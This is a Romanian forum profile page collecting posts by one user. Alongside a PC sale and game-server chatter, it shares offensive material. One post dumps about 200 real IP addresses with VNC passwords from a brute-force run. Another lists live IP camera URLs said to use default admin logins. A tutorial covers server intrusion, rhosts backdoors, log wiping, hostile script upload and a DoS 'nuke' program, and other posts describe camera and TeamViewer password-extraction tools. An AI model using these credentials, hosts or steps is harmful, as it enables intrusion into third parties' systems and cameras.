Sari la conținut

24Ghz.

Membri
  • Număr conținut

    240
  • Înregistrat

  • Ultima Vizită

2 Urmăritori

Despre 24Ghz.

  • Rang
    Super member
  • Dată Naștere 20.08.1999

Informații profil

  • Locație
    Tecuci Jud.Galati
  • Sex
    Male
  • Interese
    "Cuiele se ruleaza , nu se bat" -Ghz 2016
  • Serverul preferat
    Dava-ți ascunselea
  • Nume anterior
    jan_valuta_v@lo@re

Metode de contact

  • Steam ID
    中国的翻译
  • Website URL
    https://twitter.com/Cristea99190024
  • AIM
    +Wall.

Vizitatori Recenți Profil

1.579 citiri profil
  1. [Playlist]24Ghz.

  2. Cerere admin

    De ce mai faceti cereri de admin daca nu ajutati server-ul? Nici macar activi nu sunteti, nici macar nu va invitati prietenii sa joace dar voi totusi cereti admin, pentru ce? Un admin nu e numai pentru a bana , a dat kick si a pastra civilizatia pe server, un admin este sa si ajute serverul cu jucatori cand vezi ca e gol golut!
  3. [Prezentare] Vlad

    Salut !
  4. [Vand] Unitate GAMING!

    Nick:Cristea Alexandru Madlin Contact(Y!M, WhatsApp , SKYPE sau STEAM):Forum. Produse:Unitate Gaming Preț:3500 lei negociabil Poze produse(obligatoriu): https://postimg.org/gallery/2k2yawf0c/ Metoda de plată(Transfer credit/SMS/PayPal/Bancar): La curier! Alte precizări :Carcasa X2 Spitzer 22 Sursa Sirtec - High Power Element BRONZE II 600W Placa video MSI GeForce GTX 1050 Ti 4GT OC 4GB DDR5 128-bit Hard-disk Segate 1TB Procesor i3-4170 - 3.7 GHz. Ram 2+4 dual Channel 6GB DDR3 (Kingston) Placa de baza ASUS H81M-K Profil steam(se completeaza cu link-ul profilului dumneavoastra de steam doar in cazul in care vindeti contul de steam): - Rank(completati si atasati poza in cazul in care vindeti un cont cu csgo): 0
  5. (Prezentare) Fabian

    Salut!
  6. Salutare. incerc de 2 zile sa rulez live kali linux pe laptop, am folosit universal usb installer si kali linux 2017.03 am urmat pas cu pas diferite tutoriale dar degeaba. primes eroarea din imagine. tin sa precizez ca daca formatez usb-ul in fat32, pun kali pe el si dau boot si incerc sa il deschid live primesc eroarea din imagine daca il formatez NTFS, pun kali, dau boot si incerc sal deschid imi apare ecranul negru si trebuie sa repornesc laptopul. stick-ul este de 8gb dar am incercat si unul de 16gb. chiar nu stiu ce sa mai fac. Va multumesc anticipat. https://imgur.com/a/GDM6m
  7. Cumpar site traffic

    Privat.
  8. Limba server

    Pai limba romana fiindca pentru jucatorii de 13-16 ani ar fii mai ajutabil.
  9. Shodanwave Shodanwave is a tool for exploring and obtaining information from cameras specifically Netwave IP Camera. The tool uses a search engine called shodan that makes it easy to search for cameras online. What does the tool to? Look, a list! Search Brute force SSID and WPAPSK Password Disclosure E-mail, FTP, DNS, MSN Password Disclosure Exploit This is an example of shodan wave running, the password was not found through raw force so the tool tries to leak the camera's memory. If the tool finds the password it does not try to leak the memory. DEMO: https://asciinema.org/a/G7gVOiReMiv43V8wlMbB4mm9B?autoplay=1 How to use? To use shodanwave you need an api key which you can get for free at https://www.shodan.io/, then you need to follow the next steps. Installation $ cd /opt/ $ git clone https://github.com/fbctf/shodanwave.git $ cd shodanwave $ pip install -r requirements.txt Usage Usage: python shodanwave.py -u usernames.txt -w passwords.txt -k Shodan API key --t OUTPUT python shodanwave.py --help __ __ _____/ /_ ____ ____/ /___ _____ _ ______ __ _____ / ___/ __ \/ __ \/ __ / __ `/ __ \ | /| / / __ `/ | / / _ \ (__ ) / / / /_/ / /_/ / /_/ / / / / |/ |/ / /_/ /| |/ / __/ /____/_/ /_/\____/\__,_/\__,_/_/ /_/|__/|__/\__,_/ |___/\___/ This tool is successfully connected to shodan service Information the use of this tool is illegal, not bad. usage: shodanwave.py [-h] [-s SEARCH] [-u USERNAME] [-w PASSWORD] [-k ADDRESS] optional arguments: -h, --help show this help message and exit -s SEARCH, --search SEARCH Default Netwave IP Camera -u USERNAME, --username USERNAME Select your usernames wordlist -w PASSWORD, --wordlist PASSWORD Select your passwords wordlist -k ADDRESS, --shodan ADDRESS Shodan API key -l LIMIT, --limit LIMIT Limit the number of registers responsed by Shodan -o OFFSET, --offset OFFSET Shodan skips this number of registers from response -t OUTPUT, --output OUTPUT Save the results Attention Use this tool wisely and not for evil. To get the best performece of this tool you need to pay for shodan to get full API access Options --limit and --offset may need a paying API key and consume query credits from your Shodan account. Disclaimer Code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code. git clone https://github.com/evilsocketbr/shodanwave.git Dowloand: https://github.com/evilsocketbr/shodanwave/archive/master.zip Source: https://github.com/evilsocketbr/shodanwave
  10. Hai salut.Am gasit un pusti pe net, care vinde cu 65£ distributii de ubuntu, pentru pentestin. Ca sa ii stric putin meciul, postez urmatorul script. Cu ajutorul lui puteti transforma orice fresh install de buntu, in pentesting distro. Dezinstalarea se face cu Synaptic sau simpla comanda sudo apt-get remove panto-tools-full #!/bin/bash echo ">>>ADDING PPAs<<<" sudo add-apt-repository ppa:cybersec/panto-linux-4.3 sudo apt-get update sudo apt-get install panto-tools-full echo "Finished adding PPAs and insatlling applications" exit 0 Practic, cu acest ppa, va puteti instala toata lista de mai jos. Testat in *buntu Xenial 32/64 bit. ATENTIE, cand instalati metasploit. Copilul a pus un "echo" eronat. Puteti intra in fisierul care da erroare, si editati. Este un cuvant pus prost. Acum sa va spun ce NU face scriptul asta NU FUTE KERNEL (nu va luati kernel panic, daca utilizati eronat) NU FUTE Update-urile (este facut special pentru XENIAL) Hai sa cresteti mari, voinici, si nu va mai chinuiti cu `jdemii de aplicatii, masini virtuale si etc. Luati, instalati, utilizati. Nice, easy and simple -Information Gathering acccheck ace-voip Amap Automater bing-ip2hosts braa CaseFile CDPSnarf cisco-torch Cookie Cadger copy-router-config DMitry dnmap dnsenum dnsmap DNSRecon dnstracer dnswalk DotDotPwn enum4linux enumIAX exploitdb Fierce Firewalk fragroute fragrouter Ghost Phisher GoLismero goofile hping3 InTrace iSMTP lbd Maltego Teeth masscan Metagoofil Miranda Nmap ntop p0f Parsero Recon-ng SET smtp-user-enum snmpcheck sslcaudit SSLsplit sslstrip SSLyze THC-IPV6 theHarvester TLSSLed twofi URLCrazy Wireshark WOL-E Xplico Vulnerability Analysis BBQSQL BED cisco-auditing-tool cisco-global-exploiter cisco-ocs cisco-torch copy-router-config DBPwAudit Doona DotDotPwn Greenbone Security Assistant GSD HexorBase Inguma jSQL Lynis Nmap ohrwurm openvas-administrator openvas-cli openvas-manager openvas-scanner Oscanner Powerfuzzer sfuzz SidGuesser SIPArmyKnife sqlmap Sqlninja sqlsus THC-IPV6 tnscmd10g unix-privesc-check Yersinia Exploitation Tools Armitage Backdoor Factory BeEF cisco-auditing-tool cisco-global-exploiter cisco-ocs cisco-torch crackle jboss-autopwn Linux Exploit Suggester Maltego Teeth SET ShellNoob sqlmap THC-IPV6 Yersinia Wireless Attacks Aircrack-ng Asleap Bluelog BlueMaho Bluepot BlueRanger Bluesnarfer Bully coWPAtty crackle eapmd5pass Fern Wifi Cracker Ghost Phisher GISKismet Gqrx gr-scan kalibrate-rtl KillerBee Kismet mdk3 mfcuk mfoc mfterm Multimon-NG PixieWPS Reaver redfang RTLSDR Scanner Spooftooph Wifi Honey Wifitap Wifite Forensics Tools Binwalk bulk-extractor Capstone chntpw Cuckoo dc3dd ddrescue DFF diStorm3 Dumpzilla extundelete Foremost Galleta Guymager iPhone Backup Analyzer p0f pdf-parser pdfid pdgmail peepdf RegRipper Volatility Xplico Web Applications apache-users Arachni BBQSQL BlindElephant Burp Suite CutyCapt DAVTest deblaze DIRB DirBuster fimap FunkLoad Grabber jboss-autopwn joomscan jSQL Maltego Teeth PadBuster Paros Parsero plecost Powerfuzzer ProxyStrike Recon-ng Skipfish sqlmap Sqlninja sqlsus ua-tester Uniscan Vega w3af WebScarab Webshag WebSlayer WebSploit Wfuzz WPScan XSSer zaproxy Stress Testing DHCPig FunkLoad iaxflood Inundator inviteflood ipv6-toolkit mdk3 Reaver rtpflood SlowHTTPTest t50 Termineter THC-IPV6 THC-SSL-DOS Sniffing & Spoofing Burp Suite DNSChef fiked hamster-sidejack HexInject iaxflood inviteflood iSMTP isr-evilgrade mitmproxy ohrwurm protos-sip rebind responder rtpbreak rtpinsertsound rtpmixsound sctpscan SIPArmyKnife SIPp SIPVicious SniffJoke SSLsplit sslstrip THC-IPV6 VoIPHopper WebScarab Wifi Honey Wireshark xspy Yersinia zaproxy Password Attacks acccheck Burp Suite CeWL chntpw cisco-auditing-tool CmosPwd creddump crunch DBPwAudit findmyhash gpp-decrypt hash-identifier HexorBase THC-Hydra John the Ripper Johnny keimpx Maltego Teeth Maskprocessor multiforcer Ncrack oclgausscrack PACK patator phrasendrescher polenum RainbowCrack rcracki-mt RSMangler SQLdict Statsprocessor THC-pptp-bruter TrueCrack WebScarab wordlists zaproxy Maintaining Access CryptCat Cymothoa dbd dns2tcp http-tunnel HTTPTunnel Intersect Nishang polenum PowerSploit pwnat RidEnum sbd U3-Pwn Webshells Weevely Winexe Hardware Hacking android-sdk apktool Arduino dex2jar Sakis3G smali Reverse Engineering apktool dex2jar diStorm3 edb-debugger jad javasnoop JD-GUI OllyDbg smali Valgrind YARA Reporting Tools CaseFile CutyCapt dos2unix Dradis KeepNote MagicTree Metagoofil Nipper-ng pipal
  11. Am cautat pe forum si am observat ca nu este postat, este exact ca DuBrute, doar ca este pentru vnc's.Mai jos aveti atasat linkul cu arhiva .zip si un link spre scanul .exe-ului in virustotal : Download: https://www.sendspace.com/file/u3x29g Scan: https://www.virustotal.com/es/file/39324efe82e0956e58fef86022a44e6683564f9dc74af2d84259e96c7219fff5/analysis/1395699854/ 208.76.200.35;letmein 74.143.120.62;letmein 24.187.204.214;1234 184.186.71.27;letmein 206.230.61.213;letmein 208.40.250.16;letmein 100.2.235.108;1234 209.183.165.4;letmein 63.199.71.161;letmein 74.105.120.224;letmein 70.148.102.158;letmein 71.43.181.14;1234 205.208.42.211;1234 216.70.149.33;letmein 99.91.156.157;letmein 69.94.208.247;password 74.80.8.28;letmein 98.155.134.87;1234 174.98.175.124;password 173.15.18.190;password 69.215.26.174;password 173.220.23.66;password 69.94.208.142;password 96.39.34.34;password 69.94.208.223;password 69.94.208.177;password 69.94.208.187;password 69.94.208.219;password 69.94.208.244;password 69.94.220.201;password 98.221.2.0;password 69.94.208.229;password 71.246.211.12;password 69.94.208.220;password 69.94.208.21;password 96.10.30.234;password 108.67.65.186;1234 216.240.45.205;1234 66.99.191.230;letmein 24.249.90.58;letmein 98.180.221.96;letmein 66.99.191.227;letmein 69.14.132.199;letmein 69.167.59.129;1234 207.28.49.20;letmein 68.82.233.147;1234 69.201.176.144;password 70.165.67.46;1234 108.44.165.224;1234 68.115.238.142;password 98.114.219.211;password 174.55.6.15;password 208.76.201.202;letmein 173.167.5.241;password 24.227.139.195;1234 67.166.192.105;1234 208.122.73.1;1234 98.100.210.139;1234 204.13.32.250;letmein 68.69.169.73;letmein 24.106.62.122;1234 67.2.111.247;1234 63.237.235.203;password 65.49.171.120;password 96.56.15.114;1234 63.117.13.165;letmein 24.229.28.65;1234 204.116.75.22;1234 97.79.113.179;letmein 67.218.167.7;letmein 75.84.226.89;1234 96.254.80.23;1234 63.248.61.97;1234 74.239.201.174;letmein 70.138.128.161;letmein 192.249.67.200;1234 72.54.125.228;password 192.69.147.229;letmein 72.235.232.85;letmein 74.94.26.238;1234 70.46.167.47;1234 64.179.77.114;password 69.248.36.149;1234 173.228.64.17;password 76.95.3.198;password 71.180.173.29;1234 174.48.111.192;1234 24.187.239.62;1234 173.48.159.156;1234 98.103.53.140;1234 24.38.84.201;1234 173.165.100.225;1234 63.162.205.147;1234 75.145.210.217;1234 184.75.71.172;1234 24.227.136.2;1234 71.1.76.239;1234 70.114.233.91;password 199.227.36.216;password 97.78.98.114;password 108.198.86.218;1234 99.169.52.137;1234 108.214.230.67;1234 75.73.35.94;password 75.76.134.123;password 184.188.191.15;password 76.30.208.88;password 69.34.43.32;password 38.125.36.73;password 99.108.61.137;password 75.138.71.42;password 96.233.139.38;password 24.139.19.13;password 24.140.1.224;password 108.227.148.19;password 75.44.98.91;1234 76.77.175.194;password 199.127.124.171;password 38.105.71.174;password 75.144.213.101;password 76.208.108.26;letmein 108.47.73.70;1234 71.203.22.33;password 74.84.26.130;password 75.56.232.65;password 98.174.229.85;password 64.201.143.18;password 98.189.73.115;password 99.169.52.139;1234 207.154.100.176;password 184.189.119.114;1234 199.230.122.237;password 75.99.210.196;password 75.151.45.37;password 24.20.196.118;1234 24.111.5.74;password 96.127.193.250;password 199.58.168.51;password 71.207.93.12;password 199.66.155.2;password 65.100.41.154;password 69.249.116.167;admin 173.76.161.3;admin 68.106.157.39;admin 69.140.172.147;admin 64.121.236.60;admin 71.15.233.223;admin 98.225.233.252;admin 72.50.226.19;admin 207.195.65.220;admin 70.169.16.114;admin 70.89.27.89;admin 69.15.223.162;admin 24.173.147.118;admin 97.77.202.10;admin 75.148.20.61;admin 174.78.252.164;admin 64.20.2.38;admin 63.232.120.7;admin 64.165.66.249;admin 70.184.15.251;admin 24.182.139.146;admin 108.90.223.81;admin 71.97.230.71;admin 173.60.85.152;admin 173.190.80.158;admin 64.197.122.216;admin 74.194.191.51;admin 63.232.120.37;admin 72.54.152.30;admin 208.77.242.66;admin 64.60.135.126;admin 173.25.188.98;admin 209.112.135.218;admin 71.21.193.191;admin 207.154.111.123;admin 205.144.208.249;admin 72.17.202.162;admin 96.226.0.74;admin 196.25.145.245;1234 108.227.3.100;admin 72.55.156.75;1234 74.109.204.35;password 81.7.77.72;hotel 98.221.2.0;password 72.182.51.212;password 66.99.191.227;letmein 72.104.55.148;1234 69.248.36.149;1234 99.169.52.139;1234 108.74.19.87;admin 66.108.161.8;admin 70.138.128.161;letmein 71.180.173.29;1234 173.167.5.241;password 173.190.80.158;admin 63.226.120.183;password 98.192.227.247;password 70.46.167.47;1234 70.165.67.209;password 74.93.232.205;password 70.155.253.154;password 173.8.181.137;admin 24.106.62.122;1234 208.114.161.22;1234 72.239.10.7;admin 96.127.193.250;password 173.48.206.15;letmein 184.179.104.207;office 173.220.23.66;password 206.230.61.213;letmein 69.94.208.186;password 108.71.243.154;password 69.94.220.201;password 108.206.90.31;letmein 98.155.134.87;1234 173.48.159.156;1234 97.77.188.108;letmein 65.189.255.15;password 69.108.70.132;1234 76.95.3.198;password 69.94.208.177;password 69.94.208.229;password 75.44.98.91;1234 65.102.211.194;1234 216.157.205.69;password 216.218.14.50;admin 65.205.34.198;admin 173.12.155.153;manager 70.184.71.147;office 208.76.200.35;letmein 69.94.208.244;password 24.111.5.74;password 64.119.128.2;letmein 71.40.59.78;1234 64.93.109.161;password 70.246.227.32;admin 96.254.80.23;1234 76.30.208.88;password 173.13.93.113;letmein 98.235.206.179;manager 70.148.102.158;letmein 71.184.222.44;password 75.151.45.37;password Cele de mai sus sunt din testul efectuat de mine pentru a vedea buna functionare a programului. Enjoy!
  12. Cumpar site traffic

    Nick:24Ghz Contact:PM ori reply Vreau să cumpăr următoarele:Cum zice si titlul: [Cumpar] Site traffic - peste 1k/zi fara xxx Ofertă preț:Pretul dorit Metoda de plată:Paypal, paysafecard. Observații:1. URL 2. Print-screen Analytics
  13. Metode clasice de atac asupra oricarui server Strangerea de informatii este vitala pentru a putea obtine acces pe un server. Voi da in continuare 10 metode de adunare a informatiilor despre server.com. 1)Pentru a afla IP-ul serverului tot ce trebuie sa faceti este tastati: c:/>windows>tracert -j server.com Acum este necesar sa vedem daca are optiunea "file and print share enabled",si daca sistemul de operare este linux sau windows nt. c:/>windows>nbtstat -A ipadress unde ipadress este adresa de IP gasita la pasul anterior. Comanda va lista numele tuturor userilor din memoria cache daca serverul este prost configurat. 2)Trebuie sa aflam serviciile care ruleaza pe server:ftp,telnet,smtp,finger precum si vesiunea lor. c:/>windows>ftp server.com Daca are serviciu ftp va aparea ceva de genul "connected to server running WUFTPD...".Am aflat versiunea de server ftp care ruleaza pe portul 23. Deschidem browserul de web si introducem http://www.server.com/lalalalala.htm. Vom primi un raspuns de genul "file not found on this server.Server running apache.."Am aflat si versiunea serverului pe care sunt stocate paginile web. La fel procedam cu smtp pe portul 25.c:/>windows>telnet qmail.server.com 25 La fel vom primi un mesaj asemanator. Cunoscand toate serviciile care ruleaza pe server si versiunea acestora putem foarte usor gasi un exploit pentru ele. 3)Scanam toate bugurile cunoscute in cgi-bin,cgi-win si scripts. Cel mai bun program care face acest lucru este Cgifound. Spre exemplu un fraier mi-a trimis deunazi un link catre un server vulnerabil si anume www.server.com. Vulnerabilitea consta in programul cart32.exe care se gaseste in cgi-bin.exploitul este: www.server.com/cgi-bin/cart32.exe/cart32clientlist Parola poate fi orice cuvant si toate parolele userilor sunt listate. Este un bug cunoscut pentru cart32.exe. Pentru a vedea insa versiunea de cart32 introduceti in browser: www.server.com/cgi-bin/cart32.exe Foarte multe informatii despre vulnerabilitatile acestui program gasiti pe: www.packetstorm.securify.com tastand in motorul de cautare 'card32' sau 'card'. Este relativ usor sa afli parola unui server, asta o poate face kiddie script insa este mai greu sa nu lasi urme. Si mai greu este sa instalezi un backdoor pe server ca sa poti intra cand doresti. 4)Instalarea unui backdoor pe server se face in functie de sistemul de operare. Pentru Unix: Toti userii care au acces la serer sunt pastrati in fisierul etc/rhosts. Dupa ce am patruns inauntru editam fisierul etc/rhosts in felul urmator: #ed etc/rhosts?somesite.com someuser*w*q Sau mai simplu daca nu cunoasteti Unix este sa descarcati fisierul etc/rhosts si sa adaugati linia:somesite.com semeuser Asta inseamna ca orice utilizator de pe site-ul somesite.com se poate conecta folosind comanda 'rlogin' si userul 'someuser'. Frumos,nu? Pentru NT: Trebuie adaugat un cont in fisierul *.sam folosind programul 'net'.Mai multe amanunte gasiti pe packetstorm.securify.com tastand 'NT'. Evident acest truc este detectabil de administratorul retelei dar temporar este bun pentru ca va ajuta sa obtineti acces la radacina. Spre exemplu sub NT luati fisierele *.sam si decriptati-le. Sub Unix rulati un script care confera drept de root(SuID shell). Apoi dupa ce am obtinut toate parolele si informatiile dorite trebuie sa indepartam orice urma a 'vizitei' noastre pentru ca administratorul sa nu se prinda si sa putem intra oricand. Urmele se sterg indepartand IP-ul nostru din fisierele '*.log'. Sub Unix fisierul etc/inetd.conf contine toate serviciile care ruleaza pe server precum si setarile acestora. Ce s-ar intampla daca modificam temporar aceste setari? 5)O alta metoda cunoscuta de a obtine accesul pe un server este metoda sniffingului. Un sniffer este un program care monitorizeaza traficul pe retea si asculta pe un anume port indicat de utilizator. Cand cineva vrea sa se conecteze la serverul de mail pentru a-si citi mesajele parola si userul sunt interceptate si trimise la persoana care are snifferul in functiune. Un sniffer foarte bun este Buttsniff. Il gasiti pe www.packetstorm.securify.com. Iata cum functioneaza: c:/>buttsniff -l 0 fisier.dmp p fisier.foo Sa analizam putin acesta comanda: fisier.dmp este fisierul care va contine datele capturate de sniffer. Fisierul fisier.foo contine comenzi sau mai bine zis instructiuni. Continutul aproximativ al unui fisier.foo: -----------------------------*.*.*.*122.1.1.4+25---------------------------- Asta inseamna ca este monitorizat serverul 122.1.1.4 pe portul 25 iar celelalte porturi sunt excluse. Un fisier.foo gol inseamna ca vreti sa colectti toate datele care vin/pleaca de la server. Mai multe instructiuni gasiti in fisierul readme.txt. 6)O alta metoda de a obtine acces este metoda numita 'ftp bounch attack' Sa explic foarte pe scurt aceasta metoda: Un server ftp A nu permite acces anonim decat unui server ftp B considerat de incredere, probabil din aceeasi retea. Serverul ftp B are un cont 'guest' activat. Se poate patrunde in A prin B folosind un script cu comenzi ftp ase-manator celui de mai jos: quo "USER annonymous"quo "PASS E-mail "pasv" ...........Mai multe informatii pe astalavista. 7)Odata patrunsi intr-un server ftp trebuie sa stim adresa exacta radacinii, de obicei serverul este instalat pe o ale virtuala. Serverul www.ipswitch.com are aceasta vulnerabilitate: www.ipswitch.com/_vti_pvt/shtml si primim drept raspuns calea exacta si reala a serverului. Acum devine banal: ftp server.comuser:ftppassword:guest dir ---sa vedem la ce avem acces,poate avem acces la cgi-bin-- cd --calea aflata inainte--(c:/inet/root...)put program.exequit O alta vulnerabilitate este comanda PUT. Daca serverul este configurat prost: c:/>windows/telnet server.com 80PUT /scripts/script_ostil.asp HTTP/1.0 --corpul scriptului --/n/n/n Dupa aceea il executam din browser:www.server.com/script/script_ostil.asp. Portul poate sa nu fie 80 ci 8080 sau 8000 depinde de situatie. Trebuie intai sa vedem unde ruleaza pagini web. 9)O alta metoda,de data asta pentru profesionisti este urmarirea datagramelor sau a pachetelor de date care "intra in server". O mare companie a fost atacata in felul acesta cu ajutorul comenzii "SYN". Nu am timp sa dau detalii, poate intr-un alt tutorial, cititi articolele de pe astalavista, tastati 'tcp'. 10) Un program de nuke care intrerupe conexiunea la Internet,care exemplifica conceptul de dos attack. Ideea este ca daemonul care ruleaza pe un anumit port nu poate face fata la cereri repetate. Programul este facut in Borland C++. Compilati-l cu borland c++ ,cu alt compilator nu cred ca merge:nuke.cpp ------------------------------------------- #include <conio.h> #include <stdio.h> #include <winsock.h>struct { int port; char *targetIP; int NumOfAttact, BufSize;} parm;void Pause(void) { cprintf ("Apasati orice tasta pentru a renunta..."); getch(); cprintf ("rn"); } int CheckWinsock() { WORD wVersionRequested; WSADATA wsaData; int err; wVersionRequested = MAKEWORD(1, 1); err = WSAStartup(wVersionRequested, &wsaData); if (err != 0) return err; if ( LOBYTE( wsaData.wVersion ) != 1 || HIBYTE( wsaData.wVersion ) != 1 ) { WSACleanup(); return -1; } return 0; } void ParseIP(char* des, char *theIP) { unsigned int val; char i; for (i = 0; i < 4; i++) { if (*theIP != '
  14. Shodan.io

    [+]Ce este shodan? -Shodan.io este un motor de cautare dezvoltat de catre John Matherly, acest motor de cautare are con?inut diferit fara de celelalte motoare de cautare gen Google, Yahoo, Bing, si aia mai departe. [+]Despre inregistrarea pe acest site. -Pentru a folosi shodan nu v? trebuie neap?rat un cont dar pentru a utiliza func?iile country ?i multe altele o s? v? trebuiasc? s? crea?i un cont, crearea contului se face în mod gratuit dar contul poate fi upgradat pl?tind suma de 49$ ca s? ave?i acces la mai multe facilit??i. V? pute?i înregistra accesând acest link: www.shodanhq.com/account/register [+]Filtre after/before: limiteaz? rezultatele dup? dat? (zi/lun?/an). country: limiteaz? rezultatele dup? ?ara, trebuie scris doar ini?ialele ??rii gen country:"RO" hostname: filtreaz? rezultatele dup? un anumit hostname sau domeniu. net: filtreaz? ip-urile dup? un anumit range . os: caut? dup? un anumit sistem de operare. port: caut? dup? anumite servicii. SSL: verific? dac? addonul SSL este activat La fiecare c?utare în stânga ne va arat? prima dat? "Top Countries" primele 4 ??ri care au cele mai multe rezultate dup? queryul c?utat de noi, "Top Services" topul servicilor care se încadreaz? în c?utarea noastr?, "Top Organizations" topul organizatilor care au serverele ce sunt afi?ate pentru c?utarea executat?, "Top OS(operating systems)" topul sistemelor de operare ce sunt afi?ate pt c?utarea executat?, ?i Top Products. [+]Informa?ii despre c?utarea de servere La fiecare c?utare de servere o s? verifice dac? are port-ul 80(HTTP) deschis ?i ne va afi?a ?i un HTTP Status de exemplu: 200 - OK 301 - Moved permanently 302 - Found 401 - Unauthorizated 403 - Forbidden pentru scoaterea rezultatelor "proaste" scriem dup? fiecare c?utare -301 -302 -401 -403 ?i a?a va afi?a doar rezultatele cu r?spunsul 200! exemplu: apache -301 -302 -401 -403 Exemple: Intra?i pe shodan.io ?i scrie?i în câmpul de c?utare apache country:"CH" ?i da?i c?utare o s? va afi?eze serverele apache din Switzerland, s? încercam s? g?sim serverele apache cu hostname-ul .edu pentru asta o s? folosim comand? apache hostname:.edu , pentru c?utarea servicilor o s? folosim filtrul port apache port:21 o s? caute serverele apache care ruleaz? serviciul 21(FTP). [+]Alte informa?ii Putem seta ca ce c?ut?m s? fie salvat(în istoricul siteului) pentru viitoarele utiliz?ri dar acestea sunt indexate, func?ia este recomandat s? fie dezactivat? deoarece c?ut?rile numai sunt indexate. Cu shodan putem c?uta dup? semafoare, sisteme de curent, sisteme de vânt, camere de supraveghere ?i multe alte sisteme pe viitor o s? fac un tutorial despre accesarea unui website prin contul administratorului, accesarea sistemelor, etc. În acest tutorial vreau s? fac doar un scurt review al acestui website. Accesarea acelor sisteme se datoreaz? neglijen?ei adminului fa?? de configurarea serverului de exemplu las? serverul cu datele de logare prestabilite sau sunt scoase definitiv. Puteti avea acces si la camerele de filmat Tutorial: -Create a account on shodan.io -> login -Use dork: netwave ip camera country:"RO" city:"Timisoara" pentru a gasii orasele dintr-o tara scrieti pe google: list of cities tara si intrati pe link-ul cu wikipedia vi le va da in ordine alfabetica =================== [+]Username: admin [+]no password:D =================== Example: Ploiesti->Romania http://86.106.56.152/ Timisoara->Romania http://89.136.41.97:8080/ [+]PAKISTAN http://116.58.92.233 http://182.180.190.126:82/ http://203.128.31.49:82/ [+]UK http://50.196.204.141:81/ [+]Referin?e List? cu servici web ?i portul pe care ruleaz? ele: http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers Mai multe informatii despre shodan: https://www.youtube.com/watch?v=Pas_EB3bhEc
  15. Extract password from TeamViewer memory using Frida Hi there, in this article we want to tell about our little research about password security in TeamViewer. The method can help during the pentest time for post exploitation to get access to another machine using TeamViewer. TeamViewer automatically authentication A few days ago I worked on my windows cloud VPS with TeamViewer (where I set a custom password). After work I disconnected, at the next time when I wanted to connect, I saw that TeamViewer had auto-filled the password. I think “Interesting, how can i get access to the password? How is the password stored in my computer?” Password location I dumped the memory of the TeamViewer and grepped password. Ooo yeees, ? password in the memory is stored in Unicode format. It turns out that if you finish work with TeamViewer and don’t kill the process (or exit from TeamViewer the password will be stored in memory) After analyzing we understood that the first red area is a start magic data, in the second one – end magic data (from time to time, end magic data has this value = 00 00 00 20 00 00). Script for getting password To extract passwords from memory we wrote two mini programs, in Python and C++ language. Thx Frida team for a wonderful tool! Our python script attaches to the TeamViewer.exe process, gets the base address and memory size of each library in this process. After that, it dumps one by one memory area, searches parts with [00 88] bytes at the start and [00 00 00] bytes in the end and copies them in the array. The next and the last step is choosing end decoding raws according to the regexp and password policy. For the future The programs can extract well remote ID and passwords, but he also gets some false positive dates. If we will have free time, we will try to reduce false positive rates. Optimize C++ code from https://github.com/vah13/extractTVpasswords examples c++ example python example Sursa: https://github.com/vah13/extractTVpasswords
×